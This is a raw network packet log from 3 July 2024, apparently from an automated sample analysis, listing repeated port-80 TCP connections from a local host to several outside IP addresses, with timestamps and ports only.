                                            Jul 3, 2024 18:52:50.020333052 CEST804972481.88.48.71192.168.2.6
                                            Jul 3, 2024 18:52:50.020827055 CEST804972481.88.48.71192.168.2.6
                                            Jul 3, 2024 18:52:50.020876884 CEST4972480192.168.2.681.88.48.71
                                            Jul 3, 2024 18:52:50.859812975 CEST4972480192.168.2.681.88.48.71
                                            Jul 3, 2024 18:52:51.878088951 CEST4972680192.168.2.681.88.48.71
                                            Jul 3, 2024 18:52:51.884552002 CEST804972681.88.48.71192.168.2.6
                                            Jul 3, 2024 18:52:51.884639978 CEST4972680192.168.2.681.88.48.71
                                            Jul 3, 2024 18:52:51.886478901 CEST4972680192.168.2.681.88.48.71
                                            Jul 3, 2024 18:52:51.891570091 CEST804972681.88.48.71192.168.2.6
                                            Jul 3, 2024 18:52:51.891746044 CEST804972681.88.48.71192.168.2.6
                                            Jul 3, 2024 18:52:52.600522041 CEST804972681.88.48.71192.168.2.6
                                            Jul 3, 2024 18:52:52.600794077 CEST804972681.88.48.71192.168.2.6
                                            Jul 3, 2024 18:52:52.600867033 CEST4972680192.168.2.681.88.48.71
                                            Jul 3, 2024 18:52:53.391078949 CEST4972680192.168.2.681.88.48.71
                                            Jul 3, 2024 18:52:54.409574032 CEST4972780192.168.2.681.88.48.71
                                            Jul 3, 2024 18:52:54.414679050 CEST804972781.88.48.71192.168.2.6
                                            Jul 3, 2024 18:52:54.414792061 CEST4972780192.168.2.681.88.48.71
                                            Jul 3, 2024 18:52:54.416510105 CEST4972780192.168.2.681.88.48.71
                                            Jul 3, 2024 18:52:54.421446085 CEST804972781.88.48.71192.168.2.6
                                            Jul 3, 2024 18:52:55.116456985 CEST804972781.88.48.71192.168.2.6
                                            Jul 3, 2024 18:52:55.116543055 CEST804972781.88.48.71192.168.2.6
                                            Jul 3, 2024 18:52:55.116638899 CEST4972780192.168.2.681.88.48.71
                                            Jul 3, 2024 18:52:55.119079113 CEST4972780192.168.2.681.88.48.71
                                            Jul 3, 2024 18:52:55.124773026 CEST804972781.88.48.71192.168.2.6
                                            Jul 3, 2024 18:53:00.704240084 CEST4972880192.168.2.6156.251.142.107
                                            Jul 3, 2024 18:53:00.709146023 CEST8049728156.251.142.107192.168.2.6
                                            Jul 3, 2024 18:53:00.709219933 CEST4972880192.168.2.6156.251.142.107
                                            Jul 3, 2024 18:53:00.711011887 CEST4972880192.168.2.6156.251.142.107
                                            Jul 3, 2024 18:53:00.716459036 CEST8049728156.251.142.107192.168.2.6
                                            Jul 3, 2024 18:53:01.311511993 CEST8049728156.251.142.107192.168.2.6
                                            Jul 3, 2024 18:53:01.311537981 CEST8049728156.251.142.107192.168.2.6
                                            Jul 3, 2024 18:53:01.311654091 CEST4972880192.168.2.6156.251.142.107
                                            Jul 3, 2024 18:53:02.219259024 CEST4972880192.168.2.6156.251.142.107
                                            Jul 3, 2024 18:53:03.241764069 CEST4972980192.168.2.6156.251.142.107
                                            Jul 3, 2024 18:53:03.246963978 CEST8049729156.251.142.107192.168.2.6
                                            Jul 3, 2024 18:53:03.247093916 CEST4972980192.168.2.6156.251.142.107
                                            Jul 3, 2024 18:53:03.258177042 CEST4972980192.168.2.6156.251.142.107
                                            Jul 3, 2024 18:53:03.263106108 CEST8049729156.251.142.107192.168.2.6
                                            Jul 3, 2024 18:53:03.830629110 CEST8049729156.251.142.107192.168.2.6
                                            Jul 3, 2024 18:53:03.830897093 CEST8049729156.251.142.107192.168.2.6
                                            Jul 3, 2024 18:53:03.830956936 CEST4972980192.168.2.6156.251.142.107
                                            Jul 3, 2024 18:53:04.766041994 CEST4972980192.168.2.6156.251.142.107
                                            Jul 3, 2024 18:53:05.792187929 CEST4973080192.168.2.6156.251.142.107
                                            Jul 3, 2024 18:53:05.797092915 CEST8049730156.251.142.107192.168.2.6
                                            Jul 3, 2024 18:53:05.797197104 CEST4973080192.168.2.6156.251.142.107
                                            Jul 3, 2024 18:53:05.798965931 CEST4973080192.168.2.6156.251.142.107
                                            Jul 3, 2024 18:53:05.803745985 CEST8049730156.251.142.107192.168.2.6
                                            Jul 3, 2024 18:53:05.803844929 CEST8049730156.251.142.107192.168.2.6
                                            Jul 3, 2024 18:53:06.325517893 CEST8049730156.251.142.107192.168.2.6
                                            Jul 3, 2024 18:53:06.325638056 CEST8049730156.251.142.107192.168.2.6
                                            Jul 3, 2024 18:53:06.325680017 CEST4973080192.168.2.6156.251.142.107
                                            Jul 3, 2024 18:53:07.312849045 CEST4973080192.168.2.6156.251.142.107
                                            Jul 3, 2024 18:53:08.331899881 CEST4973180192.168.2.6156.251.142.107
                                            Jul 3, 2024 18:53:08.336827040 CEST8049731156.251.142.107192.168.2.6
                                            Jul 3, 2024 18:53:08.336920023 CEST4973180192.168.2.6156.251.142.107
                                            Jul 3, 2024 18:53:08.338696003 CEST4973180192.168.2.6156.251.142.107
                                            Jul 3, 2024 18:53:08.343558073 CEST8049731156.251.142.107192.168.2.6
                                            Jul 3, 2024 18:53:09.105983973 CEST8049731156.251.142.107192.168.2.6
                                            Jul 3, 2024 18:53:09.106955051 CEST8049731156.251.142.107192.168.2.6
                                            Jul 3, 2024 18:53:09.107017040 CEST4973180192.168.2.6156.251.142.107
                                            Jul 3, 2024 18:53:09.108711004 CEST4973180192.168.2.6156.251.142.107
                                            Jul 3, 2024 18:53:09.113709927 CEST8049731156.251.142.107192.168.2.6
                                            Jul 3, 2024 18:53:14.198893070 CEST4973380192.168.2.681.88.57.70
                                            Jul 3, 2024 18:53:14.204699039 CEST804973381.88.57.70192.168.2.6
                                            Jul 3, 2024 18:53:14.204793930 CEST4973380192.168.2.681.88.57.70
                                            Jul 3, 2024 18:53:14.206666946 CEST4973380192.168.2.681.88.57.70
                                            Jul 3, 2024 18:53:14.212359905 CEST804973381.88.57.70192.168.2.6
                                            Jul 3, 2024 18:53:14.911663055 CEST804973381.88.57.70192.168.2.6
                                            Jul 3, 2024 18:53:14.916801929 CEST804973381.88.57.70192.168.2.6
                                            Jul 3, 2024 18:53:14.916883945 CEST4973380192.168.2.681.88.57.70
                                            Jul 3, 2024 18:53:15.719125032 CEST4973380192.168.2.681.88.57.70
                                            Jul 3, 2024 18:53:16.739614010 CEST4973480192.168.2.681.88.57.70
                                            Jul 3, 2024 18:53:16.744534016 CEST804973481.88.57.70192.168.2.6
                                            Jul 3, 2024 18:53:16.744671106 CEST4973480192.168.2.681.88.57.70
                                            Jul 3, 2024 18:53:16.746392012 CEST4973480192.168.2.681.88.57.70
                                            Jul 3, 2024 18:53:16.751276970 CEST804973481.88.57.70192.168.2.6
                                            Jul 3, 2024 18:53:17.413774967 CEST804973481.88.57.70192.168.2.6
                                            Jul 3, 2024 18:53:17.413955927 CEST804973481.88.57.70192.168.2.6
                                            Jul 3, 2024 18:53:17.414016962 CEST4973480192.168.2.681.88.57.70
                                            Jul 3, 2024 18:53:18.250407934 CEST4973480192.168.2.681.88.57.70
                                            Jul 3, 2024 18:53:19.268959999 CEST4973580192.168.2.681.88.57.70
                                            Jul 3, 2024 18:53:19.274094105 CEST804973581.88.57.70192.168.2.6
                                            Jul 3, 2024 18:53:19.274203062 CEST4973580192.168.2.681.88.57.70
                                            Jul 3, 2024 18:53:19.276115894 CEST4973580192.168.2.681.88.57.70
                                            Jul 3, 2024 18:53:19.281852961 CEST804973581.88.57.70192.168.2.6
                                            Jul 3, 2024 18:53:19.282375097 CEST804973581.88.57.70192.168.2.6
                                            Jul 3, 2024 18:53:19.942409039 CEST804973581.88.57.70192.168.2.6
                                            Jul 3, 2024 18:53:19.942737103 CEST804973581.88.57.70192.168.2.6
                                            Jul 3, 2024 18:53:19.942795038 CEST4973580192.168.2.681.88.57.70
                                            Jul 3, 2024 18:53:20.781693935 CEST4973580192.168.2.681.88.57.70
                                            Jul 3, 2024 18:53:21.799994946 CEST4973680192.168.2.681.88.57.70
                                            Jul 3, 2024 18:53:21.805634975 CEST804973681.88.57.70192.168.2.6
                                            Jul 3, 2024 18:53:21.805717945 CEST4973680192.168.2.681.88.57.70
                                            Jul 3, 2024 18:53:21.807485104 CEST4973680192.168.2.681.88.57.70
                                            Jul 3, 2024 18:53:21.812426090 CEST804973681.88.57.70192.168.2.6
                                            Jul 3, 2024 18:53:22.644169092 CEST804973681.88.57.70192.168.2.6
                                            Jul 3, 2024 18:53:22.644331932 CEST804973681.88.57.70192.168.2.6
                                            Jul 3, 2024 18:53:22.644498110 CEST4973680192.168.2.681.88.57.70
                                            Jul 3, 2024 18:53:22.646984100 CEST4973680192.168.2.681.88.57.70
                                            Jul 3, 2024 18:53:22.651760101 CEST804973681.88.57.70192.168.2.6
                                            Jul 3, 2024 18:53:27.810640097 CEST4973780192.168.2.6203.161.49.220
                                            Jul 3, 2024 18:53:27.815581083 CEST8049737203.161.49.220192.168.2.6
                                            Jul 3, 2024 18:53:27.818994045 CEST4973780192.168.2.6203.161.49.220
                                            Jul 3, 2024 18:53:27.820875883 CEST4973780192.168.2.6203.161.49.220
                                            Jul 3, 2024 18:53:27.825647116 CEST8049737203.161.49.220192.168.2.6
                                            Jul 3, 2024 18:53:28.443382025 CEST8049737203.161.49.220192.168.2.6
                                            Jul 3, 2024 18:53:28.443494081 CEST8049737203.161.49.220192.168.2.6
                                            Jul 3, 2024 18:53:28.447455883 CEST4973780192.168.2.6203.161.49.220
                                            Jul 3, 2024 18:53:29.328663111 CEST4973780192.168.2.6203.161.49.220
                                            Jul 3, 2024 18:53:30.347309113 CEST4973880192.168.2.6203.161.49.220
                                            Jul 3, 2024 18:53:30.352233887 CEST8049738203.161.49.220192.168.2.6
                                            Jul 3, 2024 18:53:30.352471113 CEST4973880192.168.2.6203.161.49.220
                                            Jul 3, 2024 18:53:30.354630947 CEST4973880192.168.2.6203.161.49.220
                                            Jul 3, 2024 18:53:30.360522985 CEST8049738203.161.49.220192.168.2.6
                                            Jul 3, 2024 18:53:31.023020029 CEST8049738203.161.49.220192.168.2.6
                                            Jul 3, 2024 18:53:31.023063898 CEST8049738203.161.49.220192.168.2.6
                                            Jul 3, 2024 18:53:31.023113012 CEST4973880192.168.2.6203.161.49.220
                                            Jul 3, 2024 18:53:31.859668970 CEST4973880192.168.2.6203.161.49.220
                                            Jul 3, 2024 18:53:32.878865957 CEST4973980192.168.2.6203.161.49.220
                                            Jul 3, 2024 18:53:32.883696079 CEST8049739203.161.49.220192.168.2.6
                                            Jul 3, 2024 18:53:32.883759022 CEST4973980192.168.2.6203.161.49.220
                                            Jul 3, 2024 18:53:32.885875940 CEST4973980192.168.2.6203.161.49.220
                                            Jul 3, 2024 18:53:32.890701056 CEST8049739203.161.49.220192.168.2.6
                                            Jul 3, 2024 18:53:32.890907049 CEST8049739203.161.49.220192.168.2.6
                                            Jul 3, 2024 18:53:33.485022068 CEST8049739203.161.49.220192.168.2.6
                                            Jul 3, 2024 18:53:33.485332966 CEST8049739203.161.49.220192.168.2.6
                                            Jul 3, 2024 18:53:33.491321087 CEST4973980192.168.2.6203.161.49.220
                                            Jul 3, 2024 18:53:34.390940905 CEST4973980192.168.2.6203.161.49.220
                                            Jul 3, 2024 18:53:35.410419941 CEST4974080192.168.2.6203.161.49.220
                                            Jul 3, 2024 18:53:35.416013956 CEST8049740203.161.49.220192.168.2.6
                                            Jul 3, 2024 18:53:35.416079998 CEST4974080192.168.2.6203.161.49.220
                                            Jul 3, 2024 18:53:35.418169022 CEST4974080192.168.2.6203.161.49.220
                                            Jul 3, 2024 18:53:35.423006058 CEST8049740203.161.49.220192.168.2.6
                                            Jul 3, 2024 18:53:36.031656027 CEST8049740203.161.49.220192.168.2.6
                                            Jul 3, 2024 18:53:36.031806946 CEST8049740203.161.49.220192.168.2.6
                                            Jul 3, 2024 18:53:36.032135963 CEST4974080192.168.2.6203.161.49.220
                                            Jul 3, 2024 18:53:36.035301924 CEST4974080192.168.2.6203.161.49.220
                                            Jul 3, 2024 18:53:36.040018082 CEST8049740203.161.49.220192.168.2.6
                                            Jul 3, 2024 18:53:49.595693111 CEST4974180192.168.2.6152.32.156.214
                                            Jul 3, 2024 18:53:49.600816011 CEST8049741152.32.156.214192.168.2.6
                                            Jul 3, 2024 18:53:49.600899935 CEST4974180192.168.2.6152.32.156.214
                                            Jul 3, 2024 18:53:49.602623940 CEST4974180192.168.2.6152.32.156.214
                                            Jul 3, 2024 18:53:49.607989073 CEST8049741152.32.156.214192.168.2.6
                                            Jul 3, 2024 18:53:50.554016113 CEST8049741152.32.156.214192.168.2.6
                                            Jul 3, 2024 18:53:50.554235935 CEST8049741152.32.156.214192.168.2.6
                                            Jul 3, 2024 18:53:50.554368019 CEST4974180192.168.2.6152.32.156.214
                                            Jul 3, 2024 18:53:51.109714031 CEST4974180192.168.2.6152.32.156.214
                                            Jul 3, 2024 18:53:52.131339073 CEST4974380192.168.2.6152.32.156.214
                                            Jul 3, 2024 18:53:52.136742115 CEST8049743152.32.156.214192.168.2.6
                                            Jul 3, 2024 18:53:52.139704943 CEST4974380192.168.2.6152.32.156.214
                                            Jul 3, 2024 18:53:52.141702890 CEST4974380192.168.2.6152.32.156.214
                                            Jul 3, 2024 18:53:52.146483898 CEST8049743152.32.156.214192.168.2.6
                                            Jul 3, 2024 18:53:53.073028088 CEST8049743152.32.156.214192.168.2.6
                                            Jul 3, 2024 18:53:53.073506117 CEST8049743152.32.156.214192.168.2.6
                                            Jul 3, 2024 18:53:53.073545933 CEST4974380192.168.2.6152.32.156.214
                                            Jul 3, 2024 18:53:53.656884909 CEST4974380192.168.2.6152.32.156.214
                                            Jul 3, 2024 18:53:54.675180912 CEST4974480192.168.2.6152.32.156.214
                                            Jul 3, 2024 18:53:54.680440903 CEST8049744152.32.156.214192.168.2.6
                                            Jul 3, 2024 18:53:54.680506945 CEST4974480192.168.2.6152.32.156.214
                                            Jul 3, 2024 18:53:54.682863951 CEST4974480192.168.2.6152.32.156.214
                                            Jul 3, 2024 18:53:54.687695026 CEST8049744152.32.156.214192.168.2.6
                                            Jul 3, 2024 18:53:54.688282967 CEST8049744152.32.156.214192.168.2.6
                                            Jul 3, 2024 18:53:55.608947039 CEST8049744152.32.156.214192.168.2.6
                                            Jul 3, 2024 18:53:55.609812975 CEST8049744152.32.156.214192.168.2.6
                                            Jul 3, 2024 18:53:55.613604069 CEST4974480192.168.2.6152.32.156.214
                                            Jul 3, 2024 18:53:56.189596891 CEST4974480192.168.2.6152.32.156.214
                                            Jul 3, 2024 18:53:57.206825972 CEST4974580192.168.2.6152.32.156.214
                                            Jul 3, 2024 18:53:57.211642981 CEST8049745152.32.156.214192.168.2.6
                                            Jul 3, 2024 18:53:57.211714983 CEST4974580192.168.2.6152.32.156.214
                                            Jul 3, 2024 18:53:57.213774920 CEST4974580192.168.2.6152.32.156.214
                                            Jul 3, 2024 18:53:57.218707085 CEST8049745152.32.156.214192.168.2.6
                                            Jul 3, 2024 18:53:58.245620012 CEST8049745152.32.156.214192.168.2.6
                                            Jul 3, 2024 18:53:58.245637894 CEST8049745152.32.156.214192.168.2.6
                                            Jul 3, 2024 18:53:58.245649099 CEST8049745152.32.156.214192.168.2.6
                                            Jul 3, 2024 18:53:58.245661020 CEST8049745152.32.156.214192.168.2.6
                                            Jul 3, 2024 18:53:58.245671034 CEST8049745152.32.156.214192.168.2.6
                                            Jul 3, 2024 18:53:58.245826960 CEST4974580192.168.2.6152.32.156.214
                                            Jul 3, 2024 18:53:58.245826960 CEST4974580192.168.2.6152.32.156.214
                                            Jul 3, 2024 18:53:58.251316071 CEST4974580192.168.2.6152.32.156.214
                                            Jul 3, 2024 18:53:58.256035089 CEST8049745152.32.156.214192.168.2.6
                                            Jul 3, 2024 18:54:03.376650095 CEST4974680192.168.2.664.190.62.22
                                            Jul 3, 2024 18:54:03.381578922 CEST804974664.190.62.22192.168.2.6
                                            Jul 3, 2024 18:54:03.381650925 CEST4974680192.168.2.664.190.62.22
                                            Jul 3, 2024 18:54:03.383797884 CEST4974680192.168.2.664.190.62.22
                                            Jul 3, 2024 18:54:03.388559103 CEST804974664.190.62.22192.168.2.6
                                            Jul 3, 2024 18:54:04.029783964 CEST804974664.190.62.22192.168.2.6
                                            Jul 3, 2024 18:54:04.029802084 CEST804974664.190.62.22192.168.2.6
                                            Jul 3, 2024 18:54:04.029920101 CEST4974680192.168.2.664.190.62.22
                                            Jul 3, 2024 18:54:04.890922070 CEST4974680192.168.2.664.190.62.22
                                            Jul 3, 2024 18:54:05.910901070 CEST4974780192.168.2.664.190.62.22
                                            Jul 3, 2024 18:54:05.916130066 CEST804974764.190.62.22192.168.2.6
                                            Jul 3, 2024 18:54:05.919410944 CEST4974780192.168.2.664.190.62.22
                                            Jul 3, 2024 18:54:05.923355103 CEST4974780192.168.2.664.190.62.22
                                            Jul 3, 2024 18:54:05.928204060 CEST804974764.190.62.22192.168.2.6
                                            Jul 3, 2024 18:54:06.585807085 CEST804974764.190.62.22192.168.2.6
                                            Jul 3, 2024 18:54:06.585839987 CEST804974764.190.62.22192.168.2.6
                                            Jul 3, 2024 18:54:06.585911036 CEST4974780192.168.2.664.190.62.22
                                            Jul 3, 2024 18:54:07.422425032 CEST4974780192.168.2.664.190.62.22
                                            Jul 3, 2024 18:54:08.442048073 CEST4974880192.168.2.664.190.62.22
                                            Jul 3, 2024 18:54:08.446876049 CEST804974864.190.62.22192.168.2.6
                                            Jul 3, 2024 18:54:08.447073936 CEST4974880192.168.2.664.190.62.22
                                            Jul 3, 2024 18:54:08.449192047 CEST4974880192.168.2.664.190.62.22
                                            Jul 3, 2024 18:54:08.456381083 CEST804974864.190.62.22192.168.2.6
                                            Jul 3, 2024 18:54:08.456392050 CEST804974864.190.62.22192.168.2.6
                                            Jul 3, 2024 18:54:09.202433109 CEST804974864.190.62.22192.168.2.6
                                            Jul 3, 2024 18:54:09.202459097 CEST804974864.190.62.22192.168.2.6
                                            Jul 3, 2024 18:54:09.202538967 CEST4974880192.168.2.664.190.62.22
                                            Jul 3, 2024 18:54:09.204359055 CEST804974864.190.62.22192.168.2.6
                                            Jul 3, 2024 18:54:09.204437971 CEST4974880192.168.2.664.190.62.22
                                            Jul 3, 2024 18:54:09.427315950 CEST804974864.190.62.22192.168.2.6
                                            Jul 3, 2024 18:54:09.427378893 CEST4974880192.168.2.664.190.62.22
                                            Jul 3, 2024 18:54:09.955332994 CEST4974880192.168.2.664.190.62.22
                                            Jul 3, 2024 18:54:10.972075939 CEST4974980192.168.2.664.190.62.22
                                            Jul 3, 2024 18:54:10.977056026 CEST804974964.190.62.22192.168.2.6
                                            Jul 3, 2024 18:54:10.977121115 CEST4974980192.168.2.664.190.62.22
                                            Jul 3, 2024 18:54:10.979861021 CEST4974980192.168.2.664.190.62.22
                                            Jul 3, 2024 18:54:10.984910011 CEST804974964.190.62.22192.168.2.6
                                            Jul 3, 2024 18:54:11.626230001 CEST804974964.190.62.22192.168.2.6
                                            Jul 3, 2024 18:54:11.626373053 CEST804974964.190.62.22192.168.2.6
                                            Jul 3, 2024 18:54:11.626570940 CEST4974980192.168.2.664.190.62.22
                                            Jul 3, 2024 18:54:11.631335974 CEST4974980192.168.2.664.190.62.22
                                            Jul 3, 2024 18:54:11.636754990 CEST804974964.190.62.22192.168.2.6
                                            Jul 3, 2024 18:54:16.852211952 CEST4975080192.168.2.623.105.172.12
                                            Jul 3, 2024 18:54:16.857045889 CEST804975023.105.172.12192.168.2.6
                                            Jul 3, 2024 18:54:16.857132912 CEST4975080192.168.2.623.105.172.12
                                            Jul 3, 2024 18:54:16.859086990 CEST4975080192.168.2.623.105.172.12
                                            Jul 3, 2024 18:54:16.864048004 CEST804975023.105.172.12192.168.2.6
                                            Jul 3, 2024 18:54:17.895632029 CEST804975023.105.172.12192.168.2.6
                                            Jul 3, 2024 18:54:17.895693064 CEST804975023.105.172.12192.168.2.6
                                            Jul 3, 2024 18:54:17.895704031 CEST804975023.105.172.12192.168.2.6
                                            Jul 3, 2024 18:54:17.895894051 CEST804975023.105.172.12192.168.2.6
                                            Jul 3, 2024 18:54:17.895905972 CEST804975023.105.172.12192.168.2.6
                                            Jul 3, 2024 18:54:17.895916939 CEST804975023.105.172.12192.168.2.6
                                            Jul 3, 2024 18:54:17.895929098 CEST804975023.105.172.12192.168.2.6
                                            Jul 3, 2024 18:54:17.895956993 CEST4975080192.168.2.623.105.172.12
                                            Jul 3, 2024 18:54:17.895994902 CEST4975080192.168.2.623.105.172.12
                                            Jul 3, 2024 18:54:17.896298885 CEST804975023.105.172.12192.168.2.6
                                            Jul 3, 2024 18:54:17.896311045 CEST804975023.105.172.12192.168.2.6
                                            Jul 3, 2024 18:54:17.896395922 CEST4975080192.168.2.623.105.172.12
                                            Jul 3, 2024 18:54:17.896451950 CEST804975023.105.172.12192.168.2.6
                                            Jul 3, 2024 18:54:17.897423983 CEST4975080192.168.2.623.105.172.12
                                            Jul 3, 2024 18:54:17.900835037 CEST804975023.105.172.12192.168.2.6
                                            Jul 3, 2024 18:54:17.900934935 CEST804975023.105.172.12192.168.2.6
                                            Jul 3, 2024 18:54:17.900945902 CEST804975023.105.172.12192.168.2.6
                                            Jul 3, 2024 18:54:17.901046038 CEST4975080192.168.2.623.105.172.12
                                            Jul 3, 2024 18:54:18.375487089 CEST4975080192.168.2.623.105.172.12
                                            Jul 3, 2024 18:54:19.393928051 CEST4975180192.168.2.623.105.172.12
                                            Jul 3, 2024 18:54:19.399202108 CEST804975123.105.172.12192.168.2.6
                                            Jul 3, 2024 18:54:19.400398016 CEST4975180192.168.2.623.105.172.12
                                            Jul 3, 2024 18:54:19.402909040 CEST4975180192.168.2.623.105.172.12
                                            Jul 3, 2024 18:54:19.407715082 CEST804975123.105.172.12192.168.2.6
                                            Jul 3, 2024 18:54:20.505855083 CEST804975123.105.172.12192.168.2.6
                                            Jul 3, 2024 18:54:20.505884886 CEST804975123.105.172.12192.168.2.6
                                            Jul 3, 2024 18:54:20.505898952 CEST804975123.105.172.12192.168.2.6
                                            Jul 3, 2024 18:54:20.506010056 CEST4975180192.168.2.623.105.172.12
                                            Jul 3, 2024 18:54:20.506022930 CEST804975123.105.172.12192.168.2.6
                                            Jul 3, 2024 18:54:20.506037951 CEST804975123.105.172.12192.168.2.6
                                            Jul 3, 2024 18:54:20.506094933 CEST4975180192.168.2.623.105.172.12
                                            Jul 3, 2024 18:54:20.506234884 CEST804975123.105.172.12192.168.2.6
                                            Jul 3, 2024 18:54:20.506247044 CEST804975123.105.172.12192.168.2.6
                                            Jul 3, 2024 18:54:20.506257057 CEST804975123.105.172.12192.168.2.6
                                            Jul 3, 2024 18:54:20.506333113 CEST4975180192.168.2.623.105.172.12
                                            Jul 3, 2024 18:54:20.506463051 CEST804975123.105.172.12192.168.2.6
                                            Jul 3, 2024 18:54:20.506477118 CEST804975123.105.172.12192.168.2.6
                                            Jul 3, 2024 18:54:20.506649971 CEST4975180192.168.2.623.105.172.12
                                            Jul 3, 2024 18:54:20.510879040 CEST804975123.105.172.12192.168.2.6
                                            Jul 3, 2024 18:54:20.510943890 CEST804975123.105.172.12192.168.2.6
                                            Jul 3, 2024 18:54:20.510956049 CEST804975123.105.172.12192.168.2.6
                                            Jul 3, 2024 18:54:20.511190891 CEST4975180192.168.2.623.105.172.12
                                            Jul 3, 2024 18:54:20.906682968 CEST4975180192.168.2.623.105.172.12
                                            Jul 3, 2024 18:54:21.924913883 CEST4975280192.168.2.623.105.172.12
                                            Jul 3, 2024 18:54:21.929889917 CEST804975223.105.172.12192.168.2.6
                                            Jul 3, 2024 18:54:21.930037975 CEST4975280192.168.2.623.105.172.12
                                            Jul 3, 2024 18:54:21.933526993 CEST4975280192.168.2.623.105.172.12
                                            Jul 3, 2024 18:54:21.938479900 CEST804975223.105.172.12192.168.2.6
                                            Jul 3, 2024 18:54:21.938509941 CEST804975223.105.172.12192.168.2.6
                                            Jul 3, 2024 18:54:23.050549984 CEST804975223.105.172.12192.168.2.6
                                            Jul 3, 2024 18:54:23.050573111 CEST804975223.105.172.12192.168.2.6
                                            Jul 3, 2024 18:54:23.050578117 CEST804975223.105.172.12192.168.2.6
                                            Jul 3, 2024 18:54:23.050646067 CEST4975280192.168.2.623.105.172.12
                                            Jul 3, 2024 18:54:23.050668955 CEST804975223.105.172.12192.168.2.6
                                            Jul 3, 2024 18:54:23.050726891 CEST4975280192.168.2.623.105.172.12
                                            Jul 3, 2024 18:54:23.050769091 CEST804975223.105.172.12192.168.2.6
                                            Jul 3, 2024 18:54:23.050776958 CEST804975223.105.172.12192.168.2.6
                                            Jul 3, 2024 18:54:23.050801992 CEST4975280192.168.2.623.105.172.12
                                            Jul 3, 2024 18:54:23.050978899 CEST804975223.105.172.12192.168.2.6
                                            Jul 3, 2024 18:54:23.050987005 CEST804975223.105.172.12192.168.2.6
                                            Jul 3, 2024 18:54:23.051018953 CEST804975223.105.172.12192.168.2.6
                                            Jul 3, 2024 18:54:23.051026106 CEST804975223.105.172.12192.168.2.6
                                            Jul 3, 2024 18:54:23.051067114 CEST4975280192.168.2.623.105.172.12
                                            Jul 3, 2024 18:54:23.051080942 CEST4975280192.168.2.623.105.172.12
                                            Jul 3, 2024 18:54:23.055552006 CEST804975223.105.172.12192.168.2.6
                                            Jul 3, 2024 18:54:23.055664062 CEST804975223.105.172.12192.168.2.6
                                            Jul 3, 2024 18:54:23.055732965 CEST4975280192.168.2.623.105.172.12
                                            Jul 3, 2024 18:54:23.437920094 CEST4975280192.168.2.623.105.172.12
                                            Jul 3, 2024 18:54:24.457354069 CEST4975380192.168.2.623.105.172.12
                                            Jul 3, 2024 18:54:24.462722063 CEST804975323.105.172.12192.168.2.6
                                            Jul 3, 2024 18:54:24.465607882 CEST4975380192.168.2.623.105.172.12
                                            Jul 3, 2024 18:54:24.469583988 CEST4975380192.168.2.623.105.172.12
                                            Jul 3, 2024 18:54:24.475313902 CEST804975323.105.172.12192.168.2.6
                                            Jul 3, 2024 18:54:25.381266117 CEST804975323.105.172.12192.168.2.6
                                            Jul 3, 2024 18:54:25.381289005 CEST804975323.105.172.12192.168.2.6
                                            Jul 3, 2024 18:54:25.381428957 CEST4975380192.168.2.623.105.172.12
                                            Jul 3, 2024 18:54:25.384943008 CEST4975380192.168.2.623.105.172.12
                                            Jul 3, 2024 18:54:25.389818907 CEST804975323.105.172.12192.168.2.6
                                            Jul 3, 2024 18:54:38.801609993 CEST4975480192.168.2.6185.151.30.199
                                            Jul 3, 2024 18:54:38.807297945 CEST8049754185.151.30.199192.168.2.6
                                            Jul 3, 2024 18:54:38.807372093 CEST4975480192.168.2.6185.151.30.199
                                            Jul 3, 2024 18:54:38.809283018 CEST4975480192.168.2.6185.151.30.199
                                            Jul 3, 2024 18:54:38.815323114 CEST8049754185.151.30.199192.168.2.6
                                            Jul 3, 2024 18:54:39.578632116 CEST8049754185.151.30.199192.168.2.6
                                            Jul 3, 2024 18:54:39.580806971 CEST8049754185.151.30.199192.168.2.6
                                            Jul 3, 2024 18:54:39.580868959 CEST4975480192.168.2.6185.151.30.199
                                            Jul 3, 2024 18:54:40.315351963 CEST4975480192.168.2.6185.151.30.199
                                            Jul 3, 2024 18:54:41.331799030 CEST4975580192.168.2.6185.151.30.199
                                            Jul 3, 2024 18:54:41.336735010 CEST8049755185.151.30.199192.168.2.6
                                            Jul 3, 2024 18:54:41.336797953 CEST4975580192.168.2.6185.151.30.199
                                            Jul 3, 2024 18:54:41.338901043 CEST4975580192.168.2.6185.151.30.199
                                            Jul 3, 2024 18:54:41.343703985 CEST8049755185.151.30.199192.168.2.6
                                            Jul 3, 2024 18:54:42.132993937 CEST8049755185.151.30.199192.168.2.6
                                            Jul 3, 2024 18:54:42.133018017 CEST8049755185.151.30.199192.168.2.6
                                            Jul 3, 2024 18:54:42.133167028 CEST4975580192.168.2.6185.151.30.199
                                            Jul 3, 2024 18:54:42.844130039 CEST4975580192.168.2.6185.151.30.199
                                            Jul 3, 2024 18:54:43.862538099 CEST4975680192.168.2.6185.151.30.199
                                            Jul 3, 2024 18:54:43.867413998 CEST8049756185.151.30.199192.168.2.6
                                            Jul 3, 2024 18:54:43.869498014 CEST4975680192.168.2.6185.151.30.199
                                            Jul 3, 2024 18:54:43.873456001 CEST4975680192.168.2.6185.151.30.199
                                            Jul 3, 2024 18:54:43.878297091 CEST8049756185.151.30.199192.168.2.6
                                            Jul 3, 2024 18:54:43.878345966 CEST8049756185.151.30.199192.168.2.6
                                            Jul 3, 2024 18:54:44.660573959 CEST8049756185.151.30.199192.168.2.6
                                            Jul 3, 2024 18:54:44.660593033 CEST8049756185.151.30.199192.168.2.6
                                            Jul 3, 2024 18:54:44.660650969 CEST4975680192.168.2.6185.151.30.199
                                            Jul 3, 2024 18:54:45.375360012 CEST4975680192.168.2.6185.151.30.199
                                            Jul 3, 2024 18:54:46.393785954 CEST4975780192.168.2.6185.151.30.199
                                            Jul 3, 2024 18:54:46.399621964 CEST8049757185.151.30.199192.168.2.6
                                            Jul 3, 2024 18:54:46.401809931 CEST4975780192.168.2.6185.151.30.199
                                            Jul 3, 2024 18:54:46.405517101 CEST4975780192.168.2.6185.151.30.199
                                            Jul 3, 2024 18:54:46.410991907 CEST8049757185.151.30.199192.168.2.6
                                            Jul 3, 2024 18:54:47.172274113 CEST8049757185.151.30.199192.168.2.6
                                            Jul 3, 2024 18:54:47.172409058 CEST8049757185.151.30.199192.168.2.6
                                            Jul 3, 2024 18:54:47.172472954 CEST4975780192.168.2.6185.151.30.199
                                            Jul 3, 2024 18:54:47.175287962 CEST4975780192.168.2.6185.151.30.199
                                            Jul 3, 2024 18:54:47.180371046 CEST8049757185.151.30.199192.168.2.6
                                            Jul 3, 2024 18:54:52.389606953 CEST4975980192.168.2.6142.250.185.83
                                            Jul 3, 2024 18:54:52.394427061 CEST8049759142.250.185.83192.168.2.6
